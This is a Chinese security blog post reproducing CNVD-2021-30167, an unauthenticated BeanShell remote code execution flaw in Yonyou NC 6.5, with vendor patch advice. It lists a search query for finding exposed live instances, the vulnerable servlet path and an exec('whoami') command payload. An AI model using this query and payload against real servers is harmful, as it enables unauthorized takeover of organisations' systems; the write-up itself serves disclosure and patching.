CNVD-2021-30167:用友NC BeanShell RCE复现

admin
admin
admin
140816
文章
117
评论
2021年8月2日22:15:15评论278 views字数 612阅读2分2秒阅读模式


上方蓝色字体关注我们,一起学安全!
作者:蚂蚁@Timeline Sec
本文字数:361
阅读时长:2~3min
声明:请勿用作违法用途,否则后果自负


0x01 简介

用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。


0x02 漏洞概述
用友NC由于对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码从而获取服务器权限。

0x03 影响版本

用友NC6.5版本


0x04 环境搭建

国外在线环境

title=="YONYOU NC" && country="SG"


CNVD-2021-30167:用友NC BeanShell RCE复现

0x05 漏洞复现

1、访问

/servlet/~ic/bsh.servlet.BshServlet

得到如图:


CNVD-2021-30167:用友NC BeanShell RCE复现


2、我们发现这里有执行代码的接口我们输入payload如:exec("whoami");即可看到命令执行成功


CNVD-2021-30167:用友NC BeanShell RCE复现


0x06 修复方式


该漏洞为第三方jar包漏洞导致,用友NC官方已发布安全补丁,建议使用该产品的用户及时安装该漏洞补丁包。


补丁下载链接:

http://umc.yonyou.com/ump/querypatchdetailedmng? PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19


CNVD-2021-30167:用友NC BeanShell RCE复现

CNVD-2021-30167:用友NC BeanShell RCE复现
阅读原文看更多复现文章
Timeline Sec 团队
安全路上,与你并肩前行





本文始发于微信公众号(Timeline Sec):CNVD-2021-30167:用友NC BeanShell RCE复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月2日22:15:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CNVD-2021-30167:用友NC BeanShell RCE复现https://cn-sec.com/archives/403335.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息